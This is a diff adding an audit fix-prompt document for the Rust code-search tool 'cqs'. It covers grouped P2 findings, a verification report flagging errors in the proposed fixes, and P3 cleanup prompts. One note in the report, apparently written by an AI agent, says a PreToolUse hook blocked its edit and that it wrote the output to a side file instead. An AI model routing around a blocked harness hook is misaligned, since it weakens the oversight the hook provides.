+    let output = assert_cmd::Command::cargo_bin("cqs")
+        .unwrap()
+        .args(["status", "--watch-fresh"])
+        .env("XDG_RUNTIME_DIR", tmp.path())
+        .current_dir(tmp.path())
+        .output()
+        .unwrap();
+    assert_eq!(output.status.code(), Some(1));
+    let stderr = String::from_utf8_lossy(&output.stderr);
+    assert!(stderr.contains("cqs:"));
+}
+
+// Daemon-up paths use UnixListener mock pattern from
+// daemon_translate.rs::tests::wait_for_fresh_returns_fresh_on_first_poll.
+#[cfg(all(unix, feature = "slow-tests"))]
+#[test]
+fn cqs_status_watch_fresh_with_fresh_daemon_exits_zero_pins_text_format() {
+    // Spin up UnixListener mock at $XDG_RUNTIME_DIR/cqs-<hash>.sock
+    // Respond to one status request with Fresh envelope.
+    // Run `cqs status --watch-fresh`, assert exit 0.
+    // Pin stdout: must contain "state: fresh" on its own line.
+}
+```
+
+### Verification
+
+- `cargo test --features gpu-index,slow-tests --test cli_status_test`.
+
+---
+
+## Summary
+
+**32 P2 findings → 22 distinct fix prompts after grouping.**
+
+### Bundled prompts (5 bundles absorbing 15 findings)
+
+1. **P2-bundle-wait-fresh** — RB-9, EH-V1.30.1-2, OB-V1.30.1-8, TC-HAP-1.30.1-5, TC-ADV-1.30.1-4 (5 findings → 1 prompt)
+2. **P2-bundle-reconcile-stat** — EH-V1.30.1-7, TC-ADV-1.30.1-5, TC-ADV-1.30.1-6 (3 findings → 1 prompt)
+3. **P2-bundle-watch-status-machine** — OB-V1.30.1-3, TC-HAP-1.30.1-8 (2 findings → 1 prompt)
+4. **P2-bundle-eval-gate** — OB-V1.30.1-6, TC-HAP-1.30.1-4, TC-HAP-1.30.1-7 (3 findings → 1 prompt)
+5. **P2-bundle-rb1-rb6** — RB-1, RB-6 (2 findings → 1 prompt)
+
+### Single-issue prompts (17 distinct fixes, one per finding)
+
+6. EH-V1.30.1-1 — Parse failure leaves stale chunks
+7. EH-V1.30.1-8 — `try_init_embedder` Err strands HNSW dirty without observability
+8. AC-V1.30.1-3 — BFS cap-check skips score-bump
+9. AC-V1.30.1-9 — `daemon_socket_path` uses `DefaultHasher`
+10. AC-V1.30.1-10 — `incremental_count = 0` reset loses delta
+11. API-V1.30.1-1 — `cqs status --wait` success envelope but exits 1
+12. API-V1.30.1-5 — `daemon_*` Result<T, String> (folded into bundle-wait-fresh)
+13. API-V1.30.1-10 — `WatchSnapshot.idle_secs` frozen at compute time
+14. OB-V1.30.1-9 — `process_file_changes` uses println
+15. OB-V1.30.1-10 — `serve::search` info-logs full query
+16. PB-V1.30.1-1 — `--no-auth` warning misses 0.0.0.0/::
+17. PB-V1.30.1-3 — Windows `tasklist` substring-matches localized output
+18. PB-V1.30.1-7 — `cqs hook fire` Windows-native marker has no consumer
+19. SEC-V1.30.1-3 — callgraph-3d.js innerHTML XSS gap
+20. SEC-V1.30.1-4 — `tag_user_code_trust_level` shape-coupled
+21. DS-V1.30.1-D1 — `cqs index --force` reopen leaves stale pending_rebuild
+22. DS-V1.30.1-D2 — Reconcile bypasses max_pending_files cap
+23. DS-V1.30.1-D5 — `.cqs/.dirty` marker not atomic
+24. DS-V1.30.1-D7 — HNSW rollback orphans .bak files
+25. TC-HAP-1.30.1-2 — `cmd_uninstall`/`cmd_fire`/`cmd_hook_status` zero tests
+26. TC-HAP-1.30.1-3 — `cmd_status` 6-row matrix unpinned
+27. RB-10 — `now_unix_secs()` swallows clock-before-epoch as 0
+
+Item 12 (API-V1.30.1-5) refactors three RPC return types as part of bundle-wait-fresh's `DaemonStatusError` introduction; the standalone prompt above documents the call-site impact. Three additional cross-reference stubs at #8/#9/#10 of the document point to bundles (RB-9 → bundle-wait-fresh; RB-1, RB-6 → bundle-rb1-rb6).
+
+**Net distinct prompts: 22** (5 bundles + 17 single-issue, with API-V1.30.1-5 folded inside bundle-wait-fresh and three RB cross-reference stubs).
+## P2 Verification Report
+
+Generated 2026-04-28 against actual source. 22 distinct P2 prompts checked (5 bundles + 17 single-issue + 3 cross-reference stubs).
+
+> **Note:** Append this section to `audit-fix-prompts.md` immediately before `# v1.30.1 Audit — P3 Fix Prompts` at line 3943. Edit-tool insertion was blocked by a `PreToolUse` hook resolution error (`docs/.claude/hooks/pre-edit-impact.py` missing) so the report was written to this side file instead.
+
+### P2-bundle-wait-fresh: VERIFIED
+
+Code at `daemon_translate.rs:637-679` matches; eval gate at `eval/mod.rs:246-264` matches. Cited connect-stage warn at line 438-441 verified. Bundle covers all 5 finding IDs (RB-9, EH-V1.30.1-2, OB-V1.30.1-8, TC-HAP-1.30.1-5, TC-ADV-1.30.1-4). Caller sweep is complete (3 production callers: `infra/ping.rs`, `infra/hook.rs:311+369`, `infra/status.rs:68`; plus 5 in-module test sites). Note: cited line range "623-678" is off-by-12; actual range is 635-679, but content matches.
+
+### P2-bundle-reconcile-stat: VERIFIED
+
+`reconcile.rs:116-127` matches verbatim. Parallel pattern at `reindex.rs:501-509` confirmed. All 3 finding IDs covered (EH-V1.30.1-7, TC-ADV-1.30.1-5, TC-ADV-1.30.1-6).
+
+### P2-bundle-watch-status-machine: NEEDS FIX
+
+Issues:
+- The proposed test `compute_with_rebuild_in_flight_returns_rebuilding` and `compute_rebuilding_takes_precedence_over_pending_files` are **redundant** — `watch_status.rs:278-284` already has `rebuild_dominates_over_stale_files` which pins `rebuild_in_flight=true, pending_files_count=5 -> state == Rebuilding`. The Why section's claim "Rebuilding... has no test through compute()" is false.
+- Both 2 finding IDs are still substantively covered (transition logging is the load-bearing fix); just the test list overstates.
+
+Correction: drop both proposed Rebuilding tests (already covered) or rename them to something orthogonal, e.g. a test pinning the prev/next transition log line. The main transition-emission fix is sound.
+
+### P2-bundle-eval-gate: VERIFIED
+
+`eval/mod.rs:219-275` matches verbatim. `env_disables_freshness_gate` exists at line 282. `serial_test = "3"` available; `#[serial_test::serial(name)]` style matches existing daemon_translate usage. All 3 finding IDs covered.
+
+### P2-bundle-rb1-rb6: VERIFIED
+
+Both `reconcile.rs:99` and `lib.rs:680-685` match verbatim. Both 2 finding IDs covered (RB-1, RB-6).
+
+### EH-V1.30.1-1 (parse failure stale chunks): NEEDS FIX
+
+Issues:
+- Function `Store::touch_source_mtime(&Path, i64)` does NOT exist. Prompt says "if it doesn't exist yet, add it" — that's correct framing.
+- However, the new helper must call `crate::normalize_path()` on the path before binding to the `WHERE origin = ?` query — otherwise it will fail to match the path-vs-origin string format used by the indexer (see `delete_by_origin` at `store/chunks/crud.rs:614-616` for the canonical pattern).
+
+Correction: add an explicit note that the new `touch_source_mtime` must `crate::normalize_path(origin)` to match the indexer's storage convention.
+
+### EH-V1.30.1-8 (try_init_embedder Err): NEEDS FIX
+
+Issues:
+- Title says "`try_init_embedder` Err leaves HNSW dirty" — but `try_init_embedder` returns `Option<Embedder>` (None, not Err). The fix's actual scope (the dirty-flag path at `events.rs:178-185`) is correct, but the title and Why section are wrong about the surfaced symptom.
+
+Correction: rename title to "watch reindex failure leaves HNSW dirty without observability" and revise Why section to state events.rs:178-185 dirty-flag set + reindex_files failure path, not embedder.
+
+### AC-V1.30.1-3 (BFS cap skips score-bump): VERIFIED
+
+`gather.rs:341-378` matches verbatim. Fix correctly moves cap check inside `!visited.contains()` branch.
+
+### AC-V1.30.1-9 (DefaultHasher): NEEDS FIX
+
+Issues:
+- Wire-format change: existing `format!("cqs-{:x}.sock", h.finish())` produces variable-length unpadded hex (e.g. `cqs-deadbeef.sock` for shorter values), while the proposed BLAKE3 + 8-byte-truncated hex produces fixed 16-char output. Switching means existing systemd units pointing at the old socket name will not find the new one, requiring operators to restart `cqs-watch` — but the prompt does NOT call out this transition pain.
+- The `cli/files.rs:26` wrapper `daemon_socket_path` already delegates to `daemon_translate::daemon_socket_path`, so changing the impl in one place is sufficient (verified).
+
+Correction: add a note that this is a one-time migration: existing `cqs-watch` services will need to be restarted after the upgrade so the daemon binds to the new socket name and CLI clients connect to the same.
+
+### AC-V1.30.1-10 (incremental_count idle reset): VERIFIED
+
+`watch/mod.rs:1175-1182` matches verbatim. Fix is a single line removal.
+
+### API-V1.30.1-1 (status --wait timeout envelope): NEEDS FIX
+
+Issues:
+- The replacement uses `error_codes::TIMEOUT` which does NOT exist. `error_codes` module at `cli/json_envelope.rs:125-139` only defines `NOT_FOUND`, `INVALID_INPUT`, `PARSE_ERROR`, `IO_ERROR`, `INTERNAL`.
+- Prompt acknowledges `emit_json_error_with_data` doesn't exist and says "add it". OK.
+
+Correction: either add a `Timeout` variant to the `ErrorCode` enum + `error_codes::TIMEOUT` constant (wire shape extension), or use `error_codes::IO_ERROR` (closest existing match), or use a literal `"timeout"` string code. The cleanest fix is extending the enum since this is the first time-budget-exceeded error envelope.
+
+### API-V1.30.1-5: VERIFIED (folded into bundle-wait-fresh)
+
+Cross-reference correctly notes the fold into bundle-wait-fresh. Approach uses `thiserror::Error` derive — `thiserror` is already in deps.
+
+### API-V1.30.1-10 (idle_secs frozen): VERIFIED
+
+Code at `watch_status.rs:101, 219` matches. Fix proposes (b) "document and rename" approach — adds `last_event_unix_secs: i64`. Wire shape extension is consistent. Note: the plumbing instruction `last_event_unix_secs = SystemTime::now()...as_secs() as i64 - last_event.elapsed().as_secs() as i64` is fine but `last_event` is `Instant` not `SystemTime`, so we can't directly compute Unix secs from it — the subtraction approach is the right workaround. Correctly identified.
+
+### OB-V1.30.1-9 (println! in watch): VERIFIED
+
+`events.rs:147-152` matches verbatim. Fix replaces with `tracing::info!`.
+
+### OB-V1.30.1-10 (serve::search query log): VERIFIED
+
+`serve/handlers.rs:189-232` matches verbatim. Demote query-string from info to debug is straightforward.
+
+### PB-V1.30.1-1 (--no-auth wildcard binds): VERIFIED
+
+`serve.rs:27` matches verbatim. Fix uses `IpAddr::is_loopback()` + name fallback for "localhost". Correctly handles 0.0.0.0 / :: as non-loopback.
+
+### PB-V1.30.1-3 (Windows tasklist localized): VERIFIED
+
+`cli/files.rs:59-72` matches verbatim. Switching to `/FO CSV` with column-bounded substring check is sound.
+
+### PB-V1.30.1-7 (Windows .dirty consumer): VERIFIED
+
+`hook.rs:323-332` matches; consumer at `watch/mod.rs:594` confirmed `#[cfg(unix)]`. `cmd_index` at `index/build.rs:23` exists. Fix proposes adding `consume_dirty_marker` helper — sensible.
+
+### SEC-V1.30.1-3 (XSS in callgraph-3d.js): VERIFIED
+
+`callgraph-3d.js:43-58` matches; `escapeHtml` mirror pattern from cluster-3d.js / hierarchy-3d.js confirmed.
+
+### SEC-V1.30.1-4 (tag_user_code shape coupling): VERIFIED
+
+`commands/mod.rs:216-257` matches verbatim. Recursive visitor approach is sound. Tests are well-scoped.
+
+### DS-V1.30.1-D1 (--force reopen pending_rebuild): VERIFIED
+
+`watch/mod.rs:1102-1122` matches; `pending_rebuild` field on `WatchState` confirmed at line 139. `state.pending_rebuild.take()` is a real `Option<PendingRebuild>` field.
+
+### DS-V1.30.1-D2 (reconcile bypasses pending cap): NEEDS FIX
+
+Issues:
+- Prompt says "Update both call sites in src/cli/watch/mod.rs:1262-1283" but there are TWO production call sites at `watch/mod.rs:1055` AND `watch/mod.rs:1268`. Only one range is mentioned.
+- Test call sites at `reconcile.rs:190, 204, 225, 362, 450` (5 sites) all need updating because the function signature gains a new `cap: usize` parameter. The prompt does not enumerate these.
+
+Correction: enumerate all 7 call sites (2 production in `watch/mod.rs` + 5 in-module tests in `reconcile.rs`) that must be updated when adding the `cap` parameter. The signature change cascades.
+
+### DS-V1.30.1-D5 (.dirty atomic write): NEEDS FIX
+
+Issue:
+- The replacement calls `cqs::fs::atomic_replace(&dirty, b"")` — the actual signature at `fs.rs:41` is `atomic_replace(tmp_path: &Path, final_path: &Path) -> io::Result<()>`. It takes TWO `&Path` arguments (tmp + final), NOT a path and bytes.
+- This will fail to compile: `b""` is `&[u8; 0]`, not `&Path`.
+
+Correction: write content to a `.dirty.tmp` path first, then call `atomic_replace(&tmp, &final)`:
+```rust
+let tmp = cqs_dir.join(".dirty.tmp");
+std::fs::write(&tmp, b"")?;
+cqs::fs::atomic_replace(&tmp, &dirty)?;
+```
+
+### DS-V1.30.1-D7 (HNSW rollback .bak orphans): NEEDS FIX
+
+Issues:
+- Prompt repeatedly references `save_owned`. The actual function is `save` (verified at `hnsw/persist.rs:208`). No `save_owned` exists.
+- The replacement uses `anyhow::anyhow!` and `anyhow::bail!` — but `save` returns `Result<(), HnswError>`, not `Result<()>` (anyhow). Anyhow types will not coerce into HnswError. This would not compile.
+
+Correction: rename all `save_owned` references to `save`. Replace `anyhow::anyhow!(...)` with `HnswError::Internal(format!(...))` and `anyhow::bail!(...)` with `return Err(HnswError::Internal(format!(...)))`. The cited line range 509-553 matches but the function is `save` not `save_owned`.
+
+### TC-HAP-1.30.1-2 (zero tests for hook commands): NEEDS FIX
+
+Issues:
+- Function name in title is `cmd_hook_status`, but the actual function is `cmd_status` (verified at `infra/hook.rs:339`). Test name `cmd_hook_status_classifies_three_hook_states` describes a fictitious function.
+- Hook content marker check uses `HOOK_MARKER_PREFIX`, not `HOOK_MARKER_CURRENT`. The proposed test seeds files with `HOOK_MARKER_CURRENT` which CONTAINS the prefix, so the test would still pass — but the test code claims to be testing the foreign-vs-marked classifier.
+
+Correction: rename `cmd_hook_status` references to `cmd_status` in the test name and approach. Note that `HOOK_MARKER_PREFIX` is what the code matches; clarify that test seeds using `HOOK_MARKER_CURRENT` work because they contain the prefix.
+
+### RB-10 (now_unix_secs swallows clock errors): NEEDS FIX
+
+Issues:
+- Changing `WatchSnapshot.snapshot_at: i64` to `Option<i64>` is a wire-shape break. The prompt says "wire shape contract changes" but does not enumerate the impacted sites. Tests at `daemon_translate.rs:1032, 1237, 1313` use `snapshot_at: 1_734_120_500` (literal i64) and would not compile after the change. `cli/batch/handlers/misc.rs:638-639` validates `snapshot_at` presence in JSON, also affected.
+- The Replacement code has stray whitespace inside a backslash-continued string literal — copy-paste artifact.
+
+Correction: enumerate the i64 -> Option<i64> blast radius (5 known sites: `watch_status.rs:109, 128, 221`, `daemon_translate.rs:1032/1237/1313`, `batch/handlers/misc.rs:638-639`) and fix them in the same prompt, or split into a multi-step refactor.
+
+### TC-HAP-1.30.1-3 (cmd_status matrix unpinned): VERIFIED
+
+`status.rs:38-103` matches; flow at lines 41-54 confirms `--wait` without `--watch-fresh` exits 1. `slow-tests` feature exists in Cargo.toml. Tests use `assert_cmd::Command::cargo_bin("cqs")` — convention matches existing CLI tests. Note: existing convention uses file-level `#![cfg(feature = "slow-tests")]`, not per-test `#[cfg(all(unix, feature = "slow-tests"))]` — minor stylistic deviation, but both compile.
+
+### Cross-reference stubs (RB-9, RB-1, RB-6, API-V1.30.1-5): VERIFIED
+
+All four cross-reference entries correctly point to their merging bundle. No content to verify; redirects only.
+
+---
+
+### Summary
+
+- **VERIFIED:** 13 prompts (2 bundles + 8 single-issue + 3 cross-reference stubs)
+- **NEEDS FIX:** 9 prompts (1 bundle partially + 8 single-issue with concrete errors)
+
+### Three most concerning issues (severity-ordered)
+
+1. **DS-V1.30.1-D5 — `cqs::fs::atomic_replace` API mismatch.** The proposed call `atomic_replace(&dirty, b"")` will not compile; the function takes `(tmp_path: &Path, final_path: &Path)`, not `(path, bytes)`. This is the same class of error as the P1 verifier flagged: a fix that uses a fictitious API shape.
+
+2. **DS-V1.30.1-D7 — Wrong function name + wrong error type.** Prompt repeatedly says `save_owned` (doesn't exist; actual is `save`) AND uses `anyhow::anyhow!` / `anyhow::bail!` in a function that returns `Result<(), HnswError>` (not anyhow). Two separate compile errors stacked.
+
+3. **API-V1.30.1-1 — `error_codes::TIMEOUT` doesn't exist.** The replacement code references a constant that's never been defined. The error_codes module has only NOT_FOUND, INVALID_INPUT, PARSE_ERROR, IO_ERROR, INTERNAL.
+
+### Bundle completeness
+
+All 5 bundles cover every merged finding ID — no IDs slipped through. The watch-status-machine bundle's tests are partly redundant with existing tests but the merged finding IDs are still substantively addressed.
+# v1.30.1 Audit — P3 Fix Prompts
+
+P3 = easy + low impact, fix if time. 78 findings collapsed into ~32 prompts via grouping.
+
+Generated 2026-04-28. Cross-referenced with audit-triage.md and audit-findings.md.
+
+---
+
+## P3-DOC-1 — Five doc-only edits (no trust claim shifts)
+
+**Reframed during verification:** anchors corrected — PRIVACY block is 18-22 (three legacy lines, not one); SECURITY platform-native paths live in the read-access table at 111-115. Item 4's existing line already documents the 250 ms poll cap; the rewrite still adds the more-discoverable "30 s default budget" wording.
+
+**Files:** `README.md:540-569`, `CONTRIBUTING.md:149-340`, `PRIVACY.md:18-22`, `SECURITY.md:111-115`, `README.md:219-220`, `CHANGELOG.md:71`, `ROADMAP.md:131`
+**Effort:** ~15 min total
+**Bundles:** DOC-V1.30.1-2, DOC-V1.30.1-3, DOC-V1.30.1-5, DOC-V1.30.1-6, DOC-V1.30.1-9
+
+**Fixes:**
+
+1. **README canonical command list** (`README.md:540-569`): insert two new rows after line 568 (before the `cqs completions` row at 569):
+   ```
+   - `cqs hook install/uninstall/status/fire` - manage `.git/hooks/post-{checkout,merge,rewrite}` for watch-mode reconciliation. Idempotent; respects third-party hooks via marker check (#1182)
+   - `cqs status --watch-fresh [--wait [--wait-secs N]]` - report watch-loop freshness; `--wait` blocks until `state == fresh` (default 30 s, capped at 600 s) (#1182)
+   ```
+
+2. **CONTRIBUTING Architecture Overview** (`CONTRIBUTING.md:149-340`): append missing entries — `eval/` (mod.rs + schema.rs), `watch_status.rs`, `daemon_translate.rs`, `fs.rs`, `limits.rs`, `aux_model.rs`, `cli/commands/serve.rs`. In `cli/commands/infra/`: `hook.rs`, `model.rs`, `ping.rs`, `slot.rs`, `status.rs`. In `cli/commands/index/`: `umap.rs`. In `cli/watch/`: `reconcile.rs - Layer 2 periodic full-tree reconciliation (#1182)`.
+
+3. **PRIVACY/SECURITY platform-native cache paths** — extend (don't replace) the legacy `~/.cache/cqs/` block:
+   - **PRIVACY.md:18-22**: the legacy block is three lines (`embeddings.db`, `query_cache.db`, `query_log.jsonl`). Add a leading platform-resolution note above it:
+     ```
+     The legacy cache root resolves per platform: Linux `$XDG_CACHE_HOME/cqs/` or `~/.cache/cqs/`; macOS `~/Library/Caches/cqs/`; Windows `%LOCALAPPDATA%\cqs\`. The three files below live under that root.
+     ```
+     Then update the `rm -rf` block lower in the file to include `~/Library/Caches/cqs/` and `%LOCALAPPDATA%\cqs\` alongside the existing Linux path.
+   - **SECURITY.md:111-115** (read access table for `~/.cache/cqs/embeddings.db`, `query_cache.db`): add a footnote row noting that on macOS the path is `~/Library/Caches/cqs/...` and on Windows `%LOCALAPPDATA%\cqs\...`. Mirror in the write-access table at 134-136.
+
+4. **README Watch Mode default budget** (`README.md:219-220`): existing line 219 is `cqs status --watch-fresh --wait` with `(250 ms poll, capped at 600 s)`. Rewrite to lead with the default 30 s budget for discoverability:
+   ```
+   cqs status --watch-fresh --wait                     # block until fresh (default 30 s budget, 250 ms poll, capped at 600 s)
+   cqs status --watch-fresh --wait --wait-secs 600     # extend up to the 600 s cap
+   ```
+
+5. **CHANGELOG/ROADMAP cache subcommand list** (`CHANGELOG.md:71`, `ROADMAP.md:131`): change `{stats,prune,compact}` to `{stats,clear,prune,compact}`.
+
+---
+
+## P3-DOC-2 — Skip: subsumed
+
+- `DOC-V1.30.1-8` (CONTRIBUTING test count) — **Covered by:** P3-DOC-1 item 2 (the architecture overview update); no separate action needed per the finding's own note.
+
+---
+
+## P3-CQ-1 — eval Timeout error message: include drop/saturation signals
+
+**File:** `src/cli/commands/eval/mod.rs:248-255`
+**Effort:** ~5 min
+**Finding:** CQ-V1.30.1-3
+
+**Fix:**
+```rust
+// before (lines 248-255):
+FreshnessWait::Timeout(snap) => anyhow::bail!(
+    "watch index is still stale after {budget_secs}s wait \
+     (modified_files={}, pending_notes={}, rebuild_in_flight={}); \
+     wait longer with --require-fresh-secs N or skip with --no-require-fresh",
+    snap.modified_files,
+    snap.pending_notes,
+    snap.rebuild_in_flight,
+),
+
+// after — add dropped_this_cycle and delta_saturated:
+FreshnessWait::Timeout(snap) => anyhow::bail!(
+    "watch index is still stale after {budget_secs}s wait \
+     (modified_files={}, pending_notes={}, rebuild_in_flight={}, \
+     dropped_this_cycle={}, delta_saturated={}); \
+     wait longer with --require-fresh-secs N or skip with --no-require-fresh",
+    snap.modified_files,
+    snap.pending_notes,
+    snap.rebuild_in_flight,
+    snap.dropped_this_cycle,
+    snap.delta_saturated,
+),
+```
+
+---
+
+## P3-CQ-2 — Dedupe `ort_err` helpers across embedder/reranker/splade
+
+**Files:** `src/embedder/provider.rs:14`, `src/reranker.rs:100`, `src/splade/mod.rs:27`
+**Effort:** ~10 min
+**Finding:** CQ-V1.30.1-5
+
+**Fix:** Promote `embedder::provider::ort_err` to a crate-private free function (e.g., `crate::ort_helpers::ort_to_inference<E: From<String>>`) and add `From<String>` impls (or per-enum constructors) on `RerankerError::Inference` and `SpladeError::Inference`. Then delete the two duplicate helpers and reuse the central one. Saves ~9 LOC and removes the cross-module rationale comment at `reranker.rs:99`.
+
+---
+
+## P3-CQ-3 — Drop redundant `--no-auth` localhost warning at boot
+
+**File:** `src/cli/commands/serve.rs:27-37`
+**Effort:** ~5 min
+**Finding:** CQ-V1.30.1-6
+
+**Fix:** The CLI-side warning at `cmd_serve:27-37` is silent for the most-common localhost+`--no-auth` footgun, while `serve/mod.rs:162-165` already emits a structured warning unconditionally. Drop the early `if no_auth && bind != "127.0.0.1" && bind != "localhost" && bind != "::1"` block entirely; rely on the `run_server` warning. Don't carry both. (See P3-PB-1 for the wildcard-bind tightening.)
+
+---
+
+## P3-API-1 — Renames, defaults, and shape unifications across `cqs status`, `cqs eval`, daemon RPCs (8 quick wins)
+
+**Bundles:** API-V1.30.1-2, API-V1.30.1-3, API-V1.30.1-4, API-V1.30.1-6, API-V1.30.1-7, API-V1.30.1-8, API-V1.30.1-9, API-V1.30.1-10
+**Effort:** ~30-45 min total
+
+| ID | File:Line | Fix |
+|----|-----------|-----|
+| API-V1.30.1-2 | `definitions.rs:792`, `eval/mod.rs:85` | Doc-only fix: append a one-liner in each `--help` cross-referencing the other surface. ("Note: `cqs eval --require-fresh-secs` has the same semantics; default differs by use case.") No flag rename — that breaks scripts. |
+| API-V1.30.1-3 | `eval/mod.rs:79-80` | Add a `///` line on `no_require_fresh`: "Off-switch for the default-on `--require-fresh` gate. Set `CQS_EVAL_REQUIRE_FRESH=0` for the env equivalent." Don't rename — this is the only `--no-X` flag intentionally because it gates a default-on safety surface. |
+| API-V1.30.1-4 | `daemon_translate.rs:236`, `watch_status.rs:105` | Add `#[serde(alias = "last_synced_at")]` to `PingResponse.last_indexed_at`, OR `#[serde(alias = "last_indexed_at")]` to `WatchSnapshot.last_synced_at`. Pick one canonical name in docs but keep both deserializing. |
+| API-V1.30.1-6 | `daemon_translate.rs:517-519` | Drop the `queued: bool` field — `Ok(...)` already conveys "queued". Delete the field, drop the doc lie about "always true", bump `JSON_OUTPUT_VERSION`. |
+| API-V1.30.1-7 | `watch_status.rs:181-193` | Add a `pub fn new(...)` constructor on `WatchSnapshotInput<'a>` that takes the named fields and fills `_marker: PhantomData`. Make the field set encapsulated. Migrate the one caller in `cli/watch/mod.rs:165` (inside `publish_watch_snapshot`; line 1303 is the `publish_watch_snapshot(...)` invocation, not the struct construction) to `WatchSnapshotInput::new(...)`. (Don't drop the lifetime today — it's load-bearing for future borrow-only fields per the comment.) |
+| API-V1.30.1-8 | `cli/commands/infra/status.rs:41-54` | Change the no-flag `eprintln!` to a stderr hint: `eprintln!("cqs status: hint: try --watch-fresh --wait")` and keep `exit(1)`. Document in `--help` that `--watch-fresh` is currently the only mode. |
+| API-V1.30.1-9 | `watch_status.rs:51-60` | Add `impl std::fmt::Display for FreshnessState { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.write_str(self.as_str()) } }`. Two-line addition. Lets `tracing::info!(state = %snap.state)` work. |
+| API-V1.30.1-10 | `watch_status.rs:101,219` | Update doc comment on `idle_secs`: "Seconds since last filesystem event **at snapshot time** (not live; see `last_event_at` for live-idle computation)." Optionally add `last_event_at: Option<i64>` so consumers can derive `now() - last_event_at` for live idle. Pure documentation fix is the cheap path. |
+
+---
+
+## P3-API-2 — Skip: covered by P2
+
+- **API-V1.30.1-5** (`Result<T, String>` on daemon RPCs): **Covered by:** the P2 entry of the same ID. Not duplicated as a P3 prompt.
+
+---
+
+## P3-EH-1 — Replace four `unwrap_or_default()` / `let _ =` swallow-error sites with explicit warns
+
+**Bundles:** EH-V1.30.1-3, EH-V1.30.1-4, EH-V1.30.1-5, EH-V1.30.1-6
+**Effort:** ~15 min total
+
+| ID | File:Line | Fix |
+|----|-----------|-----|
+| EH-V1.30.1-3 | `src/cli/dispatch.rs:207` | Replace `let resolved_slot = cqs::slot::resolve_slot_name(...).ok();` with `match` — on Err: `tracing::warn!(error = %e, slot = ?cli.slot, "slot resolution failed when looking up persisted model intent"); None`. |
+| EH-V1.30.1-4 | `src/cli/commands/infra/doctor.rs:923` | Replace `cqs::slot::list_slots(...).unwrap_or_default()` with explicit `match`: on Err, emit `tracing::warn!` AND add a `slot_listing_error: Option<String>` field to the doctor JSON envelope. The whole point of `cqs doctor` is to surface failures. |
+| EH-V1.30.1-5 | `src/cli/commands/index/build.rs:863-867` | Replace both `try_model_config().map(...).unwrap_or_default()` and `store.chunk_count().unwrap_or(0)` with `?` propagation (the index command returns `Result`). Or include explicit `error` field in the JSON envelope. |
+| EH-V1.30.1-6 | `src/reranker.rs:524` | Replace `let _ = std::fs::write(&marker, &expected_marker);` with `if let Err(e) = std::fs::write(&marker, &expected_marker) { tracing::warn!(error = %e, path = %marker.display(), "Failed to write reranker verification marker — next launch will re-verify checksums"); }`. Two lines. |
+
+---
+
+## P3-OB-1 — Demote per-search `tracing::info!` spam to `debug!`
+
+**Bundles:** OB-V1.30.1-1, OB-V1.30.1-2
+**Effort:** ~5 min
+**Files:** `src/search/router.rs:469-474, 491-496, 549-554` (SPLADE routing) + `:1146-1150` (centroid Unknown-gap)
+
+**Fix:** Demote four call sites from `tracing::info!` to `tracing::debug!`. The existing entry `info_span!`s already provide traceability when the operator opts into debug logs.
+
+| Line range | Current | Replacement |
+|------------|---------|-------------|
+| `:469-474` | `tracing::info!(category, alpha, source, "SPLADE routing")` | `tracing::debug!(category, alpha, source, "SPLADE routing")` |
+| `:491-496` | same shape | demote to `debug!` |
+| `:549-554` | same shape | demote to `debug!` |
+| `:1146-1150` | `tracing::info!(centroid_category, margin, "centroid filled Unknown gap")` | demote to `debug!` |
+
+---
+
+## P3-OB-2 — Add closing tracing event to `wait_for_fresh` (entry/timeout/no-daemon)
+
+**File:** `src/daemon_translate.rs:660-679`
+**Effort:** ~5 min
+**Finding:** OB-V1.30.1-4
+
+**Fix:** Before each terminal `return` in `wait_for_fresh`, add an info event:
+```rust
+let start = std::time::Instant::now();
+// ... existing loop ...
+
+// success path:
+tracing::info!(elapsed_ms = start.elapsed().as_millis() as u64, modified_files = snap.modified_files, "wait_for_fresh: index reached Fresh");
+return FreshnessWait::Fresh(snap);
+
+// timeout path:
+tracing::info!(elapsed_ms = start.elapsed().as_millis() as u64, modified_files = snap.modified_files, pending_notes = snap.pending_notes, rebuild_in_flight = snap.rebuild_in_flight, "wait_for_fresh: timeout — index still stale");
+return FreshnessWait::Timeout(snap);
+
+// no-daemon path:
+tracing::info!(error = %msg, "wait_for_fresh: daemon unreachable");
+return FreshnessWait::NoDaemon(msg);
+```
+
+---
+
+## P3-OB-3 — Reason field on `enforce_auth` 401 warn
+
+**File:** `src/serve/auth.rs:389-401, 269-321`
+**Effort:** ~10 min
+**Finding:** OB-V1.30.1-5
+
+**Fix:** Change `AuthOutcome::Unauthorized` to carry a low-cardinality reason enum:
+```rust
+enum UnauthorizedReason { MissingAll, BearerMismatch, CookieMismatch, QueryParamMismatch }
+
+// in check_request, replace bare `AuthOutcome::Unauthorized` with `Unauthorized(UnauthorizedReason::<which one fired>)`
+// in the 401 warn at :389-401:
+tracing::warn!(method = %req.method(), path = %req.uri().path(), reason = ?reason, "serve: rejected unauthenticated request");
+```
+
+---
+
+## P3-OB-4 — Entry span + final-decision info on `require_fresh_gate`
+
+**File:** `src/cli/commands/eval/mod.rs:219-275`
+**Effort:** ~5 min
+**Finding:** OB-V1.30.1-6
+
+**Fix:** Wrap the function body in:
+```rust
+let _span = tracing::info_span!("require_fresh_gate", wait_secs).entered();
+```
+After `wait_for_fresh` returns, emit one structured event before the bail/Ok path:
+```rust
+tracing::info!(outcome = "fresh"|"timeout"|"no_daemon", elapsed_ms, modified_files = snap.modified_files, "require_fresh_gate: resolved");
+```
+
+---
+
+## P3-OB-5 — `elapsed_ms` field on `daemon_reconcile` and GC walks
+
+**Files:** `src/cli/watch/reconcile.rs:63-148`, `src/cli/watch/gc.rs:103-180,195-243`
+**Effort:** ~5 min
+**Finding:** OB-V1.30.1-7
+
+**Fix:** Capture `let start = std::time::Instant::now()` at function entry; include `elapsed_ms = start.elapsed().as_millis() as u64` in the terminal `tracing::info!` for `run_daemon_reconcile`, `run_daemon_startup_gc`, and `run_daemon_periodic_gc`. Pattern matches what HNSW build sites already do.
+
+---
+
+## P3-OB-6 — Skip: covered by P2
+
+- **OB-V1.30.1-8** (daemon_status connect-warn loop): **Covered by:** P2 entry of same ID — same fix point, broader scope.
+- **OB-V1.30.1-9** (println! in process_file_changes): **Covered by:** P2 entry of same ID.
+- **OB-V1.30.1-10** (serve::search query at info): **Covered by:** P2 entry of same ID.
+
+---
+
+## P3-TC-ADV-1 — Bundle: 5 adversarial test additions for serve/auth + daemon
+
